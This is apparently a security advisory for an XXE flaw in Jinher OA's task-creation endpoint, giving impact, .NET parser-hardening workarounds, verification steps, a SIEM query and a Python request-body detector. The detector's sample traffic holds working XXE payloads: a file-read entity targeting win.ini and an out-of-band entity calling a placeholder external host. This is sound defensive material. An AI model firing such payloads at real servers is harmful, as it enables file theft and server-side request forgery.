CVE-2025-10092

7.3 HIGH

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in Jinher OA up to version 1.2, in the XML handler behind /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add. By submitting XML whose DOCTYPE declares external entities, a remote attacker can read files the web server process can access or make the server issue requests to internal systems (server-side request forgery). Code execution via XXE is uncommon, particularly in .NET applications, and would depend on the server configuration. Organizations running Jinher OA versions up to 1.2 with the vulnerable XML handler component are affected.

💻 Affected Systems

Products:
  • Jinher OA
Versions: Up to version 1.2
Operating Systems: Windows / IIS (inferred from the ASP.NET .aspx endpoint; not stated in the advisory)
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerability exists in the XML handler component at /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add

📦 What is this software?

Jinher OA is an office automation (OA) suite. The affected endpoint, AddTask.aspx, is an ASP.NET page in the product's project-management module (Jhsoft.Web.projectmanage); the task-creation handler behind it parses XML supplied in the request, which is where the external entity processing occurs.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote attackers could read any file the web server process can access (web.config and other configuration files holding database connection strings or credentials), pivot into internal services via SSRF from the server's network position, and, in rare configurations, escalate to remote code execution.

🟠

Likely Case

Attackers will likely exfiltrate sensitive configuration files, credentials, or conduct SSRF attacks against internal services accessible from the vulnerable server.

🟢

If Mitigated

With DTD processing disabled in the XML parser the vulnerability is closed. Where only network controls are in place (egress filtering, segmentation), out-of-band exfiltration and SSRF are blocked, but the attacker can still read files available to the web server process if the application reflects their content.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The exploit has been made public according to the CVE description, and XXE vulnerabilities typically have low exploitation complexity with available tools.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Not available

Restart Required: No

Instructions:

No official patch is listed for this CVE. Check with Jinher for a security update or a fixed release; until one is available, apply the workarounds below.

🔧 Temporary Workarounds

Disable DTD and external entity processing in the XML parser

Applies to: all affected versions

Configure the parser so that it never resolves external entities and, ideally, rejects any DOCTYPE declaration outright.

The settings often quoted for this, FEATURE_SECURE_PROCESSING and disallow-doctype-decl, are Java (JAXP/Xerces) options and do not apply to an ASP.NET application. The .NET equivalents are XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit together with XmlResolver = null, XmlDocument.XmlResolver = null, and DtdProcessing.Prohibit on any XmlTextReader. They must be set in the code that parses the request, so this workaround needs access to the application source or a vendor-provided switch; it cannot be applied from outside the application.

Input validation and sanitization

Applies to: all affected versions

Reject any request to the endpoint whose XML contains a DOCTYPE declaration; a legitimate AddTask request has no reason to carry one. Blocking only <!ENTITY ... SYSTEM> leaves parameter-entity and PUBLIC variants open.

Enforce this with XML schema validation or a pattern check at a reverse proxy or WAF. Treat pattern filtering as a stop-gap: it can be bypassed with alternative encodings (for example a UTF-16 body), so parser hardening remains the real fix.

🧯 If You Can't Patch

  • Implement a web application firewall (WAF) with XXE protection rules, inspecting request bodies for DOCTYPE declarations on the affected path
  • Restrict network access to the vulnerable endpoint using firewall rules or network segmentation
  • Block outbound connections from the web server except to the destinations it needs; this stops out-of-band exfiltration and limits SSRF reach, although file reads reflected in responses remain possible

🔍 How to Verify

Check if Vulnerable:

Send the endpoint /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add a request whose XML contains a DOCTYPE. Start with an internal entity only (harmless; if its value is reflected, the parser processes DTDs), then an external entity pointing at a listener you control (out-of-band confirmation works even when nothing is reflected). XXEinjector or hand-crafted XML both work; take the request framing from an intercepted legitimate request.

Check Version:

Check Jinher OA version in application interface or configuration files

Verify Fix Applied:

Retest with XXE payloads after implementing workarounds, including the out-of-band variant, to ensure they no longer succeed; a reflected-only test can miss a blind XXE.

📡 Detection & Monitoring

Log Indicators:

  • Unusual XML parsing errors
  • Requests to /c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx with XML content
  • Outbound connections from web server to unexpected internal systems

Network Indicators:

  • HTTP requests containing XML with DOCTYPE declarations or external entity references
  • Unusual outbound connections from web server following XXE exploitation

SIEM Query:

(source="waf" OR source="reverse_proxy") AND uri="/c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx*" AND (body="*<!DOCTYPE*" OR body="*<!ENTITY*")

The query needs a log source that records request bodies (a WAF, reverse proxy or request-tracing capture); IIS access logs do not contain them. Do not match on a bare "%" or "SYSTEM": both occur in ordinary URL-encoded form posts and would bury the alert in noise.
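The body-level indicators above, turned into a small classifier as an added example (not code from the advisory or from Jinher). It assumes request bodies are available from a WAF, reverse proxy or tracing capture, and the SAMPLE_REQUESTS it scans are constructed for this example; the first record shows why a query on "%" alone is unusable.

```python
"""Request-body XXE detector for the Jinher OA AddTask.aspx endpoint.

Added example; not code from the advisory or from Jinher. Assumes request
bodies are logged (WAF, reverse proxy or request-tracing capture). The
SAMPLE_REQUESTS are constructed for this example.
"""
import re
import urllib.parse

TARGET_PATH = "/c6/jhsoft.web.projectmanage/taskmanage/addtask.aspx"

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)
# general entity with an external identifier: <!ENTITY x SYSTEM "..."> or PUBLIC
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)
# parameter entity: the building block of blind / out-of-band XXE
PARAM_ENTITY_RE = re.compile(r"<!ENTITY\s+%\s*\w+", re.I)
SCHEME_RE = re.compile(r"\b(?:file|https?|ftp|gopher|jar|netdoc):/", re.I)


def normalize_path(uri: str) -> str:
    """Strip the query string and trailing slash; the advisory's path ends in '/'."""
    return uri.split("?", 1)[0].rstrip("/").lower()


def classify(record: dict) -> dict:
    """Score one request. The body is URL-decoded once because the XML is
    often carried inside a form field rather than posted raw."""
    decoded = urllib.parse.unquote_plus(record.get("body", ""))
    reasons = []
    if DOCTYPE_RE.search(decoded):
        reasons.append("doctype")
    if EXTERNAL_ENTITY_RE.search(decoded):
        reasons.append("external-entity")
    if PARAM_ENTITY_RE.search(decoded):
        reasons.append("parameter-entity")
    if reasons and SCHEME_RE.search(decoded):
        reasons.append("uri-scheme")
    on_target = normalize_path(record.get("uri", "")) == TARGET_PATH

    if "external-entity" in reasons or "parameter-entity" in reasons:
        severity = "high" if on_target else "medium"
    elif "doctype" in reasons:
        severity = "medium" if on_target else "low"
    else:
        severity = "none"
    return {"severity": severity, "reasons": reasons, "on_target": on_target}


def scan(records):
    """Return (index, severity, reasons) for every request worth an alert."""
    hits = []
    for i, rec in enumerate(records):
        result = classify(rec)
        if result["severity"] != "none":
            hits.append((i, result["severity"], result["reasons"]))
    return hits


ENDPOINT = "/c6/Jhsoft.Web.projectmanage/TaskManage/AddTask.aspx/?Type=add"
_FILE_XXE = ('<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM '
             '"file:///C:/Windows/win.ini">]><r>&x;</r>')
_OOB_XXE = ('<!DOCTYPE r [<!ENTITY % ext SYSTEM "http://collab.example/x.dtd"> '
            '%ext;]><r>p</r>')

# Constructed sample traffic (not real logs).
SAMPLE_REQUESTS = [
    # 0: ordinary form post; the "%" here would match a naive SIEM query
    {"uri": ENDPOINT, "body": "Type=add&title=Q3+plan&pct=50%25"},
    # 1: plain XML without a DOCTYPE: legitimate
    {"uri": ENDPOINT, "body": "<task><title>Q3 plan</title></task>"},
    # 2: DTD present but only an internal entity: reconnaissance, worth a look
    {"uri": ENDPOINT, "body": '<!DOCTYPE r [<!ENTITY c "canary">]><r>&c;</r>'},
    # 3: file-read XXE carried URL-encoded inside a form field
    {"uri": ENDPOINT, "body": urllib.parse.urlencode({"Type": "add", "xml": _FILE_XXE})},
    # 4: blind / out-of-band XXE against a different path
    {"uri": "/c6/other.aspx", "body": _OOB_XXE},
]

if __name__ == "__main__":
    for index, severity, reasons in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {severity} ({', '.join(reasons)})")
```

Feed it the decoded body field from your WAF or proxy export; the severity split (DOCTYPE alone versus an external or parameter entity) keeps internal-entity noise from paging anyone while still surfacing the blind variant, which the page's network indicators would otherwise only catch after the outbound connection has already happened.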
